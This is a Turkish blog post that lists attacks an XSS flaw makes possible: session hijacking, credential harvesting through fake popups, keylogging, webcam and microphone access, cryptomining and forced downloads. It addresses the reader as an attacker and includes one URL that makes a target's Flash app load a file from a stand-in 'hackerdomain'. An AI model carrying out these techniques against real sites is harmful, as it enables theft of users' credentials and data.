Ana içeriğe atla

XSS Açığı ile Yapabileceğiniz Hacking Çeşitleri (Saldırı Yöntemleri)


Merhaba arkadaşlar herkese iyi akşamlar. Yine farklı bir yazı yazayım dedim. Ve herkesin kullandığı ve bildiği xss saldırıları üzerine yazı yazayım dedim :) Bu yazıda xss'yi anlatmadım. Başka forumlarda veya bloglar da okuyabilirsiniz .  Ben herkesin bildiği xss açıkları ile neler yapabiliriz diyerek bu yazıyı yazıyorum. Belki başka yöntemler de vardır. Sonuçta hayal gücünüze kalmış birşey. Bu yazıda xss ile yapılabilecek saldırı çeşitleri anlatılmaktadır. İyi okumalar..:)
  • Ad-Jacking - Bir web sitesinde XSS'i çalıştırmayı başarırsanız, para kazanmak için reklamlarınızı enjekte edin;)
  • Click Jacking - Kötü niyetli eylemler gerçekleştirmek üzere kurbanın tıklamalarını kaçırmak için sayfada gizli bir kaplama oluşturabilirsiniz.(ifram açıp özelliklerini sıfır yapıp kendinizi admin yapma gibi)
  • Sessions Hijacking - Çerezlerde HTTP bayrağı bulunmuyorsa, HTTP çerezlerine JavaScript tarafından erişilebilir.(bir nevi cookie hacking)
  • Content Spoofing - JavaScript, bir web uygulamasının müşteri tarafı koduna tam erişime sahiptir ve bu nedenle, istediğiniz içeriği göstermek / değiştirmek için kullanabilirsiniz.
  • Credential Harvesting - En eğlenceli kısım. Kimlik bilgilerini almak için süslü bir açılır pencere kullanabilirsiniz. (WiFi ürün yazılımı güncellendi, kimlik doğrulaması için kimlik bilgilerinizi tekrar girin gibi)
  • Zorunlu İndirmeler - Yani kurban kötü niyetli flash player'ınızı absolutely-safe.com adresinden indirmiyor mu? Endişelenmeyin, kurbanınızın ziyaret ettiği güvenilir web sitesinden indirmeye zorlama konusunda daha fazla şansınız olacak. (
    1
    http://www.target.com/FlashApp.swf?movietoload=http://hackerdomain/hackedFlash.swf)
  • Kripto Para Madenciliği - Evet, kurbanın CPU'sunu sizin için biraz bitcoin madeni yapmak için kullanabilirsiniz!
  • CSRF korumasını atlamak - POST isteklerini JavaScript ile yapabilir, JavaScript ile bir CSRF tokenlerini toplayabilir ve gönderebilirsiniz, ..;)
  • Keylogging - Hepiniz bunun ne olduğunu biliyorsunuz.
  • Ses Kaydetme - Kullanıcıdan yetki alınması gerekir, ancak kurbanın mikrofonuna erişirsiniz. HTML5 ve JavaScript sayesinde.
  • Fotoğraf çekme - Kullanıcıdan yetki alınması gerekir, ancak mağdurun web kamerasına erişirsiniz. HTML5 ve JavaScript sayesinde.
  • Coğrafi konum - Kullanıcıdan yetki gerektirir, ancak mağdurun Coğrafi konumuna erişirsiniz. HTML5 ve JavaScript sayesinde. GPS'li cihazlarla daha iyi çalışır.
  • HTML5 web depolama verilerini çalmak - HTML5 yeni bir özellik olan web depolama özelliğini tanıttı. Artık bir web sitesi daha sonra kullanmak üzere tarayıcıda veri depolayabilir ve tabii ki, JavaScript bu depolamaya window.localStorage () ve window.webStorage () aracılığıyla erişebilir. Sizde xss ile bunları çalabilirisiniz :) 
  • Tarayıcı ve Sistem Parmak İzi - JavaScript, tarayıcınızın adını, sürümünü, yüklü eklentilerini ve sürümlerini, işletim sisteminizi, mimariyi, sistem zamanını, dili ve ekran çözünürlüğünü bulmanızı sağlar.
  • Ağ Taraması - Kurbanın tarayıcısı JavaScript'i kullanarak portları ve hostları taramak için kötüye kullanılabilir.
  • Tarayıcıların Çökmesi - Evet! Tarayıcıyı, onları… .stuff ile tıkayarak çökertebilirsiniz.
  • Bilgi Çalmak - Web sayfasından bilgi alın ve sunucunuza gönderin. Basit!
  • Yönlendirme - Kullanıcıları seçtiğiniz bir web sayfasına yönlendirmek için javascript kullanabilirsiniz.
  • Sekme-AçmaYeniden yönlendirmenin yalnızca süslü bir sürümü. Örneğin, bir dakikadan uzun süre klavye ya da fare olayı alınmadıysa, kullanıcının afk olduğu ve geçerli web sayfasını gizli bir sahtekarlıkla değiştirebileceğiniz anlamına gelebilir. (Yani kullanıcı afk'yse bir süre sonra farklı bir adrese yönlendirebilir zararlı yazım indirtebilirsiniz)
  • Ekran Yakalama - Yine HTML5 sayesinde bir web sayfasının ekran görüntüsünü alabilirsiniz. Kör XSS algılama araçları bunu rahatlıkla yapıyor.
  • İşlemlerinizi Gerçekleştirin - Tarayıcıyı kontrol ediyorsunuz, gücü hissedemiyor musunuz? Bir sosyal medya sitesinde XSS var mı? Mesaj gönderebilir, bilgileri değiştirebilir ve… .. fikri anlayabilirsiniz.

Yorumlar